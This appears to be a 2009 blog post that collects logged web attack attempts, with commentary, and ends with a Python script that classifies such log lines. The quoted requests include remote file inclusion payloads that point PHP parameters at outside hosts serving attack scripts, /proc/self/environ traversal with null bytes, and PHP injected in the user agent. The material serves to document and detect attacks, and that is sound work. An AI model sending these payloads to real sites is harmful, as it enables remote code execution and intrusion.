Server Logs

April 21, 2009 by Guy Patterson


Some interesting Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Blind SQL Injections, Remote Code Execution, and Remote Code Injection attempts pulled from a number of server httpd logs. This page should result in some entertaining data...

www.ayj.ca - buggsbunny??? WTF?

Unique breed right here. This guy is probably abused, even as an adult. Aaaww, poor guy.

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"

140.109.103.221 - "GET /various-tools/server-logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 51421 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"

140.109.103.221 - "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 50336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools/server-logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

140.109.103.221 - "GET /various-tools//assets/snippets/reflect/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"

Yet Another Idiot

These people don't even research their targets. Had the malicious dick visited the target page, he hopefully would have realized it is a post about a vulnerability, not a page running the completely different content publishing platform his exploit is aimed at...

211.49.99.7 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

211.49.99.7 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

211.49.99.7 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

216.65.1.253 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fultonschoolstalbans.org/blogs/23classroom/wp-includes/js/tinymce/plugins/inlinepopups/css//id1.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

72.232.246.34 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET /wordpress-users-beware-new-vulnerability-release//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

68.112.43.9 - "GET /wordpress-users-beware-new-vulnerability-release/%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 19015 "-" "Mozilla/5.0"

Wrong Operating System - Nice Try...

66.218.148.129 - "GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 5328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

66.218.148.129 - "GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0 HTTP/1.1" 404 5328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

Java/1.6.0_13@24.185.176.146

24.185.176.146 - "GET /search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /extern_js/f/CgJlbhICdXMgACswCjgVLCswDjgFLCswGDgDLCswJTjJiAEsKzAmOAQsKzAnOAAs/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/ads/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /search/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /services/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /url/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /extern_js/f/CgJlbhICdXMgACswCjgVLCswDjgFLCswGDgDLCswJTjJiAEsKzAmOAQsKzAnOAAs/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/ads/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /intl/en/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

24.185.176.146 - "GET /images/search/search/search/search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"

Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC):

92.249.186.39 - "GET /ashop/catalogue.php?cat=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18036 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

92.249.186.39 - "GET /ashop/catalogue.php?cat=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18036 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /wordpress-users-beware-new-vulnerability-release//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /wordpress-users-beware-new-vulnerability-release//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 67754 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

203.246.75.102 - "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18284 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

203.246.75.102 - "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 18284 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.53.85.154 - "GET /another-wordpress-plugin-vulnerability-wp-forum-174/search.php?sid= HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in/errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in//errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 67796 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /errors.php?error=http://www.fmf2004.hu/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in/errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

8.7.26.27 - "GET /a-shopping-cart-solution-worth-investing-in//errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 67796 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.222.5.120 - "GET /category/make-money//errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

74.222.5.120 - "GET /category/make-money/errors.php?error=http://www.threelights.de/i?? HTTP/1.1" 404 18124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 18447 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /find-r57-and-c99-shells-hidden-inside-php-and-txt-files/bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 68124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

77.221.130.2 - "GET /automated-adsense-privacy-policy-deployment-guide/bu/process.php?bu_dir=http://www.newsitedesigns.com/scripts/robots.txt?? HTTP/1.1" 404 68124 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"

More Shipments From Fail Boat:

80.250.162.2 - "GET //advanced1.php?pluginpath[0]=http://www.europeytu.com/.httpaccess/maxid.txt???? HTTP/1.1" 301 0 "-" "libwww-perl/5.803"

80.250.162.2 - "GET /gmail-sorry-you-account-has-been-disabled//advanced1.php?pluginpath[0]=http://www.europeytu.com/.httpaccess/maxid.txt???? HTTP/1.1" 301 0 "-" "libwww-perl/5.803"

67.129.133.11 "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

67.129.133.11 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

67.129.133.11 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://85.159.65.83:32000//accounts/inc/api/funzeldibunzel.txt?????? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

81.176.226.186 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

89.111.173.72 - "GET /wordpress-users-beware-new-vulnerability-release/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

89.111.173.72 - "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.meetpark.com/prc.gif? HTTP/1.1" 301 0 "-" "libwww-perl/5.805"

212.227.64.146 - "GET /header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"

212.227.64.146 - "GET /howto-run-multiple-poor-mans-bans-sites...-1-wordpress-installation/header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"

212.227.64.146 - "GET /howto-run-multiple-poor-mans-ban...1-wordpress-installation/header.php?abspath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 18036 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
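For anyone who wants to pull the same kinds of requests out of their own httpd logs, here is a small classifier for the patterns shown above. It is an added example, not part of the original post; the tag names, the `classify`/`summarize` helpers and the sample lines (documentation IPs and hostnames) are made up for illustration.

```python
import re
from urllib.parse import parse_qsl

# Trimmed format used on this page; the "-" after the IP is sometimes missing.
LINE = re.compile(
    r'^(?P<ip>\S+) (?:- )?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)    # parameter value is a URL
CODE_TAG = re.compile(r'[<\[]\?')                       # "<?" or the "[?" form shown above
SCRIPTED_UA = re.compile(r'^(?:libwww-perl|Java)/')     # HTTP libraries, not browsers
WINDOWS_PATHS = ('/_vti_bin/', '/msoffice/cltreq.asp')  # IIS/FrontPage-style paths

def classify(line):
    """Return (ip, sorted tags) for one log line, or None if it does not parse."""
    m = LINE.match(line.strip())
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    tags = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            tags.add('remote-file-include')
        if '../' in value:
            tags.add('path-traversal')
        if '\x00' in value:  # %00 after URL decoding
            tags.add('null-byte')
    if CODE_TAG.search(m['ua']):
        tags.add('code-in-user-agent')
    if SCRIPTED_UA.match(m['ua']):
        tags.add('scripted-client')
    if path.lower().startswith(WINDOWS_PATHS):
        tags.add('windows-only-path')
    return m['ip'], sorted(tags)

# Constructed sample lines, modelled on the format of the entries above.
SAMPLE = r'''
192.0.2.10 - "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://files.example/id.txt?? HTTP/1.1" 404 51421 "-" "Mozilla/5.0"
192.0.2.10 - "GET /errors.php?error=../../../../proc/self/environ%00 HTTP/1.1" 404 51421 "-" "XXX[? echo "w0000t"; ?]XXX"
192.0.2.20 - "GET /_vti_bin/owssvr.dll?UL=1&ACT=4 HTTP/1.1" 404 5328 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.30 "GET /search? HTTP/1.1" 301 0 "-" "Java/1.6.0_13"
192.0.2.40 - "GET /various-tools/server-logs/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
'''.strip().splitlines()

def summarize(lines):
    """Map each source IP to the union of tags seen across its requests."""
    seen = {}
    for ip, tags in filter(None, map(classify, lines)):
        seen.setdefault(ip, set()).update(tags)
    return seen
```

`summarize(SAMPLE)` groups the tags per source IP, which makes it easy to spot one address cycling through several techniques the way 140.109.103.221 does at the top of this page.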
